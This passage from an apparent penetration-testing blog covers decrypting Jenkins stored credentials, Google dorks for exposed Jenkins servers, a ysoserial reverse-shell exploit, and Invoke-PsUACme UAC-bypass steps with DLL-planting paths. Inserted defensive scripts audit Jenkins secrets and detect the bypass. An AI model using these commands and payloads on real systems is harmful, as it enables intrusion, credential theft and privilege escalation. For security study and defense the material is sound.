The keys could be converted back to the raw format using <a href="https://github.com/samratashok/nishang/blob/master/Utility/TexttoExe.ps1">TexttoExe from Nishang</a> (or any other tool or script on *nix). <br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\nishang> . C:\nishang\Utility\TexttoExe.ps1
PS C:\nishang> TexttoEXE -FileName C:\test\hudson.util.txt -EXE C:\test\hudson.util.secret
PS C:\nishang> TexttoEXE -FileName C:\test\master.txt -EXE C:\test\master.key
</textarea></pre>
Using decrypt.py from <a href="https://github.com/samratashok/ContinuousIntrusion">here</a> (updated version of the one <a href="https://github.com/tweksteen/jenkins-decrypt/">here</a>) the passwords can be decrypted:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeQMLoe-7QC-TresPXtIzM1wjRlXtvIeGkza_-zSVr4e5SNZoZdwAmoIKRgagxISu5pbzQgw8B9tH2-ooxfhrc3nTk7BbFUXpWjU7xkvzwy_xJFQADUIhf-rU01a7wBMANnp-UO1eOyXs/s1600/jenkins_decrypted.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeQMLoe-7QC-TresPXtIzM1wjRlXtvIeGkza_-zSVr4e5SNZoZdwAmoIKRgagxISu5pbzQgw8B9tH2-ooxfhrc3nTk7BbFUXpWjU7xkvzwy_xJFQADUIhf-rU01a7wBMANnp-UO1eOyXs/s400/jenkins_decrypted.png" width="400" /></a></div>
Bingo! And this is 2015. Let's all do a facedesk together.<br />
<br />
Note that in the case of SSH keys, the above exercise is required only to retrieve the passphrase. The SSH keys themselves are stored in clear text in $JENKINS_HOME or in credentials.xml! Also, no salt is used when encrypting the passwords, so it is possible to compare encrypted passwords from Jenkins with known encrypted text.<br />
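A defender-side check for the two weaknesses covered in the Removing Security and Decrypt Credentials sections, as an added example that is not part of the original post or of decrypt.py: it verifies that config.xml keeps useSecurity on, and inspects how each secret in credentials.xml is stored, flagging unsalted legacy blobs that repeat (same ciphertext, same password) and private keys kept as PEM text. It assumes the IV-based container that later Jenkins versions introduced (a 0x01 byte, two big-endian lengths, IV, ciphertext) and that the secret-bearing tags are password, passphrase, privateKey and secret; all XML is constructed and nothing is decrypted.

```python
"""Audit a Jenkins home for two weaknesses from the post: security switched off
in config.xml and unsalted (legacy) secrets in credentials.xml.

Added example, not part of the original post or of decrypt.py. Nothing is
decrypted; only the stored format is inspected. All XML below is constructed.
"""
import base64
import struct
import xml.etree.ElementTree as ET
from collections import defaultdict

# Assumption: these element names carry secrets in credentials.xml.
SECRET_TAGS = {"password", "passphrase", "privateKey", "secret"}
PAYLOAD_V1 = 1   # leading byte of the IV-based container used by later Jenkins versions


def classify_secret(value):
    """Return "v1" (IV-based container), "legacy" (unsalted AES-ECB blob) or "plain"."""
    text = value.strip()
    if text.startswith("{") and text.endswith("}"):   # newer Jenkins wraps secrets in braces
        text = text[1:-1]
    try:
        raw = base64.b64decode(text, validate=True)
    except ValueError:   # binascii.Error is a ValueError: not base64, so stored in clear
        return "plain"
    if len(raw) >= 9 and raw[0] == PAYLOAD_V1:
        iv_len, data_len = struct.unpack(">II", raw[1:9])   # Java DataOutputStream ints are big-endian
        if len(raw) == 9 + iv_len + data_len and iv_len == 16 and data_len % 16 == 0:
            return "v1"
    if len(raw) >= 16 and len(raw) % 16 == 0:   # ECB/PKCS5 output: whole AES blocks, no IV
        return "legacy"
    return "plain"


def audit_credentials(credentials_xml):
    """Count secrets per storage format and list legacy ciphertexts that occur more than once.

    With no salt, two identical legacy ciphertexts mean two identical passwords.
    Private keys stored as PEM text are counted separately as "cleartext_key".
    """
    counts = defaultdict(int)
    by_ciphertext = defaultdict(int)
    for elem in ET.fromstring(credentials_xml).iter():
        text = (elem.text or "").strip()
        if elem.tag not in SECRET_TAGS or not text:
            continue
        if elem.tag == "privateKey" and "-----BEGIN" in text:
            counts["cleartext_key"] += 1
            continue
        kind = classify_secret(text)
        counts[kind] += 1
        if kind == "legacy":
            by_ciphertext[text.strip("{}")] += 1
    reused = sorted(ct for ct, n in by_ciphertext.items() if n > 1)
    return {"counts": dict(counts), "reused_legacy_ciphertexts": reused}


def security_enabled(config_xml):
    """True only if useSecurity is on and both a realm and an authorization strategy are set."""
    root = ET.fromstring(config_xml)
    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        return False
    return root.find("securityRealm") is not None and root.find("authorizationStrategy") is not None


def legacy_blob(raw):
    """Constructed legacy value: base64 of whole blocks (not real AES output)."""
    return base64.b64encode(raw).decode()


def v1_blob(iv, data):
    """Constructed v1 container: 0x01, IV length, data length, IV, data, wrapped in braces."""
    body = bytes([PAYLOAD_V1]) + struct.pack(">II", len(iv), len(data)) + iv + data
    return "{" + base64.b64encode(body).decode() + "}"


SHARED_LEGACY_CT = legacy_blob(bytes([0x11]) * 32)   # same blob twice: the reuse the post warns about
V1_CT = v1_blob(bytes([0x22]) * 16, bytes([0x33]) * 32)

SAMPLE_CREDENTIALS_XML = f"""<com.cloudbees.plugins.credentials.SystemCredentialsProvider>
  <domainCredentialsMap><entry><java.util.ArrayList>
    <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
      <id>git-deploy</id><username>build</username><password>{SHARED_LEGACY_CT}</password>
    </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
    <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
      <id>db-admin</id><username>sa</username><password>{SHARED_LEGACY_CT}</password>
    </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
    <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
      <id>slave-key</id><username>jenkins</username><passphrase>{V1_CT}</passphrase>
      <privateKey>-----BEGIN RSA PRIVATE KEY-----
CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY
-----END RSA PRIVATE KEY-----</privateKey>
    </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
  </java.util.ArrayList></entry></domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>"""

SAMPLE_CONFIG_XML_OK = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
</hudson>"""
SAMPLE_CONFIG_XML_DISABLED = SAMPLE_CONFIG_XML_OK.replace("<useSecurity>true", "<useSecurity>false")

if __name__ == "__main__":
    print("security enabled:", security_enabled(SAMPLE_CONFIG_XML_OK))
    print(audit_credentials(SAMPLE_CREDENTIALS_XML))
```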
<br />
<h4>
Google Dorks</h4>
Use the Google dorks below for public instances of Jenkins. More can be created depending on the use case:<br />
Public instances: intitle:"Dashboard [Jenkins]"<br />
Public instances with no authentication: intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins"<br />
<br />
Just replace Jenkins with Hudson in above for Hudson instances.<br />
<br />
The kind of sensitive data exposed by public instances of Jenkins is amazing! They leak a lot about how source code is created and managed. While looking at such instances one can find passwords for private source code repositories, links to products under development, employee data and more, what I found was more interesting than any of these.<br />
<br />
In the screenshot below, someone left an interesting message on a public unauthenticated server of Jenkins.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBOtFeKhVXu3aAjwIYd5M67u7AVCm0siFZUD35agfjFgavK1gEf1f8gkb9_NjpgzZXFkFlsDV7RW5dZNkUPVBtkkGD3RGWlvGxjxMwqdNQLouklowZ9uicrI_EGYkLHNbT05NywwGA1dY/s1600/Jenkins_Public_Msg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBOtFeKhVXu3aAjwIYd5M67u7AVCm0siFZUD35agfjFgavK1gEf1f8gkb9_NjpgzZXFkFlsDV7RW5dZNkUPVBtkkGD3RGWlvGxjxMwqdNQLouklowZ9uicrI_EGYkLHNbT05NywwGA1dY/s400/Jenkins_Public_Msg.png" width="400" /></a></div>
Another one, highlighting the state of security of CI tools is below. This Jenkins instance runs as root without authentication:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSyuPqPD4AAEtTAZ8Ie9onHbuELc0YU7GRbjz7HM1-B6rgHQVz2-HEnLLfxYuOz_bDjEYQgtjkeE4GVqjCeNvj_fjqcYNe0ZxSUtLMchxr3qleAfLTe0guHMwTggtfNvRNMo1kYLzD5E/s1600/Jenkins_Public_Root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSyuPqPD4AAEtTAZ8Ie9onHbuELc0YU7GRbjz7HM1-B6rgHQVz2-HEnLLfxYuOz_bDjEYQgtjkeE4GVqjCeNvj_fjqcYNe0ZxSUtLMchxr3qleAfLTe0guHMwTggtfNvRNMo1kYLzD5E/s400/Jenkins_Public_Root.png" width="400" /></a></div>
<h4>
Unserialization Vulnerability</h4>
<br />
In case you missed it, Jenkins (and many more tools) were affected by the Unserialization bug in commons-collection Java library. Read more about it <a href="http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">here</a>.<br />
<br />
This vulnerability could be exploited to get remote command execution on a Jenkins instance. All we need is:<br />
1. Get the ysoserial (cool name!) from here: <a href="https://github.com/frohoff/ysoserial">https://github.com/frohoff/ysoserial</a> </div>
<div style="text-align: justify;">
2. Create a reverse shell using ysoserial:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e <encoded_reverse_shell>' > payload.out
</textarea></pre>
3. Get the Jenkins exploit from here: <a href="https://github.com/foxglovesec/JavaUnserializeExploits">https://github.com/foxglovesec/JavaUnserializeExploits</a><br />
4. Use it against a Jenkins instance (in your lab): <br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">python jenkins_exploit.py 192.168.230.125 8080 payload.out
</textarea></pre>
5. Do the victory dance. </div>
<div style="text-align: justify;">
<br />
This is what success looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFix1U3hSfFMHNOuAEl4NFWlMYdgBE86mAABzgAgfGyWPI3bYbmmdG8l_HjnJXpm4TGbAfR-ODSwkOCL62mhRNP28MCUPcV7wleP6rcakr3Nor1YyJTI0eT0T9I_AOdYA-JE4J1hu0D90/s1600/jenkins_unserialize.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFix1U3hSfFMHNOuAEl4NFWlMYdgBE86mAABzgAgfGyWPI3bYbmmdG8l_HjnJXpm4TGbAfR-ODSwkOCL62mhRNP28MCUPcV7wleP6rcakr3Nor1YyJTI0eT0T9I_AOdYA-JE4J1hu0D90/s400/jenkins_unserialize.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Instances exposed on the internet may be safe because the exploit connects to a high, randomly chosen port (port 49189 in the above screenshot). If an environment allows connections to such ports from the Internet, it probably has bigger problems to solve.<br />
<br />
Jenkins released a fix on 11th November, 2015 which could be <a href="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11">found here</a>.<br />
<br />
<h4>
Video Demonstration</h4>
I made a quick video to demonstrate attacks discussed in this post. <br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/hdT_8tjqxrE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/hdT_8tjqxrE?feature=player_embedded" width="320"></iframe></div>
<h4>
Slides of my talk at BlackHat Europe and DeepSec</h4>
I gave a talk at BlackHat Europe and DeepSec on Continuous Intrusion: Why CI tools are an attacker's best friends. Slides are here:<br />
<b><a href="http://www.slideshare.net/nikhil_mittal/continuous-intrusion-why-ci-tools-are-an-attackers-best-friends">http://www.slideshare.net/nikhil_mittal/continuous-intrusion-why-ci-tools-are-an-attackers-best-friends</a></b><br />
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br /></div>
</div>
<b>Bypassing UAC with PowerShell</b> (Nikhil SamratAshok Mittal, published 2015-09-30, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Recently during a Red Team engagement, I got shell access to some user machines using <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">Client Side Attacks</a>. In many cases, the users had administrative privileges but I was stuck in non-elevated PowerShell reverse <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html">shells</a>. UAC (User Account Control) was the spoilsport here. I hate UAC; it is annoying, yet it "<a href="https://support.microsoft.com/en-us/kb/2526083">is not a security boundary</a>". I read and tried stuff for bypassing UAC and learned that it is trivial to bypass. In this post, we will go through various methods and the code required to bypass UAC.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The tool of choice for bypassing UAC is UACME <a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a>. This awesome tool implements various methods and is thankfully open source. Thanks to <a href="https://twitter.com/hFireF0X">@hFireF0X</a>.<br />
<br />
As I always try to keep the post-exploitation phase within PowerShell, I tested UACME and implemented some of the methods using PowerShell. I give you <b>Invoke-PsUACme.ps1</b>. It can be found in the <a href="https://github.com/samratashok/nishang/tree/master/Escalation">Escalation category</a> of Nishang. </div>
<div style="text-align: justify;">
Let's begin with the sysprep method, which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009 (<a href="http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html">details here</a>), it involves the following steps:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version.<br />
CRYPTBASE.dll for Windows 7<br />
shcore.dll for Windows 8</div>
<div style="text-align: justify;">
2. Execute sysprep.exe from the above directory. It will load the above DLL and execute it with elevated privileges. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:</div>
<style type="text/css">
table.tableizer-table {
border: 1px solid #CCC; font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #ccc;
}
.tableizer-table th {
background-color: #104F8C;
color: #FFF;
font-weight: bold;
}
</style><br />
<table class="tableizer-table"><tbody>
<tr class="tableizer-firstrow"><th>Method Name</th><th>Write DLL to</th><th>DLL Name</th><th>Executable to Use</th></tr>
<tr><td>sysprep</td><td>C:\Windows\System32\sysprep\</td><td>CRYPTBASE.dll for Windows 7 and shcore.dll for Windows 8</td><td>C:\Windows\System32\sysprep\sysprep.exe</td></tr>
<tr><td>oobe</td><td>C:\Windows\System32\oobe\</td><td>wdscore.dll for Windows 7, 8 and 10</td><td>C:\Windows\System32\oobe\setupsqm.exe</td></tr>
<tr><td>actionqueue</td><td>C:\Windows\System32\sysprep\</td><td>ActionQueue.dll only for Windows 7</td><td>C:\Windows\System32\sysprep\sysprep.exe</td></tr>
<tr><td>migwiz</td><td>C:\Windows\System32\migwiz\</td><td>wdscore.dll for both Windows 7 and 8</td><td>C:\Windows\System32\migwiz\migwiz.exe</td></tr>
<tr><td>cliconfg</td><td>C:\Windows\System32\</td><td>ntwdblib.dll for Windows 7, 8 and 10</td><td>C:\Windows\System32\cliconfg.exe</td></tr>
<tr><td>winsat</td><td>C:\Windows\System32\sysprep\ (copy winsat.exe from C:\Windows\System32\ to C:\Windows\System32\sysprep\ first)</td><td>ntwdblib.dll for Windows 7 and devobj.dll for Windows 8 and 10</td><td>C:\Windows\System32\sysprep\winsat.exe</td></tr>
<tr><td>mmc</td><td>C:\Windows\System32\</td><td>ntwdblib.dll for Windows 7 and elsext.dll for Windows 8 and 10</td><td>C:\Windows\System32\mmc.exe eventvwr</td></tr>
</tbody></table>
<div style="text-align: left;">
Builds Tested:<br />
Windows 7 build 6.1.7601.65536<br />
Windows 8.1 build 6.3.9600.0<br />
Windows 10 build 10.0.10240.0</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Now, to copy the DLL to the sysprep directory, we need elevated privileges. The two most popular ways of achieving this elevation are: use an IFileOperation COM object, or use Wusa.exe with its "extract" option.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Currently, Invoke-PsUACme uses the Wusa method. Since Wusa is set to auto-elevate, we can use it to extract a cab file to the sysprep directory. A cab file can be created using the makecab utility.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">C:\> makecab C:\uac\evil.dll C:\uac\uac.cab
C:\> wusa C:\uac\uac.cab /extract:C:\Windows\System32\sysprep\</textarea></pre>
<div style="text-align: justify;">
The above commands are shown only to explain what Invoke-PsUACme does; they need not be run manually.</div>
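From the defender's side, the two steps just described are also the two observable events of this chain: a wusa.exe run with /extract pointing into a System32 subfolder, followed shortly by the launch of one of the auto-elevating executables from the table. Both show up as command lines in any process-creation source (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled). The PowerShell below is an added example and is not part of Nishang or of this post: the function name Test-UacBypassCommandLine and the sample command lines are mine and constructed for illustration; the executable paths are the ones from the table.

```powershell
# Added example (not Nishang code): flag process command lines that match the two stages of
# the UAC bypass chain described in the post. Input is a list of command-line strings as a
# process-creation log source (Sysmon Event ID 1 / Security 4688) would record them.

# Auto-elevating executables from the table. mmc.exe is matched together with its
# "eventvwr" argument because a plain mmc.exe launch is common on administrator hosts.
$AutoElevateTargets = @(
    'C:\Windows\System32\sysprep\sysprep.exe',
    'C:\Windows\System32\oobe\setupsqm.exe',
    'C:\Windows\System32\migwiz\migwiz.exe',
    'C:\Windows\System32\cliconfg.exe',
    'C:\Windows\System32\sysprep\winsat.exe',
    'C:\Windows\System32\mmc.exe eventvwr'
)

function Test-UacBypassCommandLine {
    # Returns a finding object for a suspicious command line, or $null for a benign one.
    param([Parameter(Mandatory = $true)][string]$CommandLine)

    # Stage 1: wusa.exe extracting a .cab into a protected location. Normal update installs
    # ("wusa update.msu /quiet") never use /extract with a System32 destination.
    if ($CommandLine -match 'wusa(\.exe)?["\s]+(\S+\.cab)["\s]+/extract:(?<dest>.+)$') {
        $dest = $Matches['dest'].Trim().Trim('"')
        if ($dest -like 'C:\Windows\System32*') {
            return [pscustomobject]@{
                Stage       = 'DLL drop via wusa /extract'
                Detail      = "extracts to $dest"
                CommandLine = $CommandLine
            }
        }
    }

    # Stage 2: launch of an auto-elevating executable that would load the planted DLL.
    foreach ($target in $AutoElevateTargets) {
        if ($CommandLine -like "*$target*") {
            return [pscustomobject]@{
                Stage       = 'Auto-elevating executable launched'
                Detail      = $target
                CommandLine = $CommandLine
            }
        }
    }
    return $null
}

# Constructed sample command lines (not taken from a real host). The first two are the
# two stages of the sysprep method as shown above; the last two are benign.
$SampleCommandLines = @(
    'C:\Windows\System32\wusa.exe C:\uac\uac.cab /extract:C:\Windows\System32\sysprep\',
    'C:\Windows\System32\sysprep\sysprep.exe',
    'C:\Windows\System32\wusa.exe C:\Users\alice\Downloads\update.msu /quiet /norestart',
    'C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt'
)

$SampleCommandLines |
    ForEach-Object { Test-UacBypassCommandLine -CommandLine $_ } |
    Where-Object { $null -ne $_ } |
    Format-Table -AutoSize -Wrap
```

Run against the constructed sample, only the first two lines produce findings. Stage 2 on its own is a weak signal on hosts where administrators run sysprep or migwiz legitimately, so in practice the two stages should be correlated within a short window and the executable list baselined per environment.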
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Now, the DLL which Invoke-PsUACme uses is Fubuki from the UACME project with a minor change. Instead of executing cmd.exe, we tell the DLL to execute cmd.bat from C:\Windows\Temp. It is this cmd.bat which will contain our payload to be executed on the target. This provides us a lot of flexibility while executing complex attacks.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQGU_tAOom-9mWV4VvPFMit-Z9uKpztA6vYqaNjcJT6BRFLWPFVhM_MtvmBZG1zxWWjUsFoNZZQRQia9mYMxLHRFYhz5uLEK9ho03wQp0qeiQrl79O37JMh3JNh3rBxePkzwIeT_zO8c/s1600/Fubuki.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQGU_tAOom-9mWV4VvPFMit-Z9uKpztA6vYqaNjcJT6BRFLWPFVhM_MtvmBZG1zxWWjUsFoNZZQRQia9mYMxLHRFYhz5uLEK9ho03wQp0qeiQrl79O37JMh3JNh3rBxePkzwIeT_zO8c/s400/Fubuki.png" width="400" /> </a></div>
The above DLLs (for 64-bit and 32-bit) are hard-coded in the script in the DLLBytes64 and DLLBytes32 variables. The script determines the bitness of the process from which it is called and uses the appropriate DLL.<br />
<br />
Coming to the more interesting part, Invoke-PsUACme can be used this way:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> . C:\nishang\Escalation\Invoke-PsUACme.ps1
PS C:\> Invoke-PsUACme -method sysprep</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDkTAuGXlHXelQsNa9unidDtYglj575XqpYhPtMZUVi-S50B7ZdK16VQiiV7J33mz9XCSd8hhQ9SxFgh6Xn1elRUn2MDAfLiIijfJIiFTkim0QRK96cc0nrOwY9-ni8zg5e6LbXFslBSw/s1600/Invoke-PsUAC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDkTAuGXlHXelQsNa9unidDtYglj575XqpYhPtMZUVi-S50B7ZdK16VQiiV7J33mz9XCSd8hhQ9SxFgh6Xn1elRUn2MDAfLiIijfJIiFTkim0QRK96cc0nrOwY9-ni8zg5e6LbXFslBSw/s400/Invoke-PsUAC.png" width="400" /></a></div>
Nice, we are able to bypass UAC! The default payload just checks if the bypass was successful.
Note that the -noexit parameter is passed to PowerShell in cmd.bat so that we can see the output.<br />
<br />
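The same table tells a defender exactly where to look on a host after the fact: each method needs a specifically named file in a specific System32 location, the default payload lands in C:\Windows\Temp\cmd.bat, and every method depends on UAC auto-elevation being in effect, which it is not at the "Always notify" level (ConsentPromptBehaviorAdmin = 2 with EnableLUA = 1). The script below is an added example, not code from Nishang or UACME: the function names Get-PlantedFileFindings and Get-UacElevationPolicy are mine; the directories and file names are those from the table and text above.

```powershell
# Added example (not Nishang or UACME code): audit a host for the files this technique
# must plant and check whether auto-elevation is enabled at all. Run from an elevated
# prompt so that the System32 subfolders and HKLM are readable.

# Where each method from the table plants its DLL (or copied executable) and its name.
$PlantedFileCandidates = @(
    @{ Dir = 'C:\Windows\System32\sysprep\'; Names = @('CRYPTBASE.dll', 'shcore.dll', 'ActionQueue.dll', 'ntwdblib.dll', 'devobj.dll', 'winsat.exe') },
    @{ Dir = 'C:\Windows\System32\oobe\';    Names = @('wdscore.dll') },
    @{ Dir = 'C:\Windows\System32\migwiz\';  Names = @('wdscore.dll') },
    @{ Dir = 'C:\Windows\System32\';         Names = @('ntwdblib.dll', 'elsext.dll') }
)

# Default batch file executed by the modified Fubuki DLL (the post's default PayloadPath).
$DefaultPayloadPath = 'C:\Windows\Temp\cmd.bat'

function Get-PlantedFileFindings {
    # Reports every candidate file that exists, with its Authenticode status: a dropped
    # DLL is unsigned or not Microsoft-signed, a stock component carries a valid signature.
    foreach ($candidate in $PlantedFileCandidates) {
        foreach ($name in $candidate.Names) {
            $path = Join-Path -Path $candidate.Dir -ChildPath $name
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $sig = Get-AuthenticodeSignature -FilePath $path
            [pscustomobject]@{
                Path        = $path
                SignatureOK = ($sig.Status -eq 'Valid')
                Signer      = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }
                LastWrite   = (Get-Item -LiteralPath $path).LastWriteTime
            }
        }
    }
    # The payload batch file is never a legitimate Windows artefact; report it if present.
    if (Test-Path -LiteralPath $DefaultPayloadPath) {
        [pscustomobject]@{
            Path        = $DefaultPayloadPath
            SignatureOK = $false
            Signer      = '(batch payload file; review its contents)'
            LastWrite   = (Get-Item -LiteralPath $DefaultPayloadPath).LastWriteTime
        }
    }
}

function Get-UacElevationPolicy {
    # Auto-elevation is only switched off at "Always notify": EnableLUA = 1 and
    # ConsentPromptBehaviorAdmin = 2. The Windows default value of 5 leaves it on.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        AutoElevationDisabled      = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -eq 2)
    }
}

Get-UacElevationPolicy | Format-List
Get-PlantedFileFindings | Format-Table -AutoSize -Wrap
```

A hit with SignatureOK set to false in one of these folders is worth a closer look; a valid Microsoft signature usually means a stock file that happens to share the name. Since the PayloadPath parameter lets the batch file live elsewhere, the cmd.bat check only covers the script's default.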
<h4>
Custom Payload</h4>
We can always use custom payloads as well:
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-PsUACme -method oobe -Payload "powershell -noexit -c Get-Process" </textarea></pre>
Note that we need to specify powershell.exe as well. Whatever is specified for the Payload parameter ends up in C:\Windows\Temp\cmd.bat. You can always change the path to the batch file using the PayloadPath parameter, after changing it in the DLL as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhP4NTEeyPnZVt0qQPL5KkmwfxDhrDk8-jXnAZH3u59Bkgzk_SetS1Xugq9tkzTwrX3e_IwXN1eLZaG6pjAWTOI3g7GsV8Rohg_reAh1FBFZ1ZWbFdFDCmT8S277UPysmCwP0Rl59ovo/s1600/cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhP4NTEeyPnZVt0qQPL5KkmwfxDhrDk8-jXnAZH3u59Bkgzk_SetS1Xugq9tkzTwrX3e_IwXN1eLZaG6pjAWTOI3g7GsV8Rohg_reAh1FBFZ1ZWbFdFDCmT8S277UPysmCwP0Rl59ovo/s320/cmd.png" width="320" /></a></div>
We will come back to more practical use of the Payload parameter in a minute.<br />
<br />
<h4>
Custom DLL</h4>
To use a custom DLL, we can use the CustomDLL64 and CustomDLL32 parameters. For example, let's use the original 64-bit Fubuki DLL from UACME with Invoke-PsUACme:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-PsUACme -CustomDll64 C:\test\Fubuki64.dll -CustomDll32 C:\test\Fubuki32.dll -Verbose</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzLW6uKlifYEQe2rwpL8-uDSoc0Et_dym84gkZPQ037s0R4F0KnGOyyvoaTv6GiShIT9dfKAGbdGfkh9uAtsQ1xa3TA480oLWGjvI7qJxsPciXCunxPtLwsN11IvkZ-say1SXwG389pEk/s1600/Fubuki_32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzLW6uKlifYEQe2rwpL8-uDSoc0Et_dym84gkZPQ037s0R4F0KnGOyyvoaTv6GiShIT9dfKAGbdGfkh9uAtsQ1xa3TA480oLWGjvI7qJxsPciXCunxPtLwsN11IvkZ-say1SXwG389pEk/s400/Fubuki_32.png" width="400" /></a></div>
We can also provide a byte array of DLLs to the DLLBytes64 and DLLBytes32 parameters.<br />
<br />
<h4>
Ok, fine. How is it useful?</h4>
Let's recreate the scenario with which I started the post: we have a few reverse PowerShell shells with no elevated rights. We can use Invoke-PsUACme to execute commands and scripts with elevated rights. Let's take the <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">reverse TCP one-liner</a> from Nishang, encode it using <a href="https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Encode.ps1">Invoke-Encode</a> and use it with Invoke-PsUACme:<br />
<div class="separator" style="clear: both; text-align: center;">
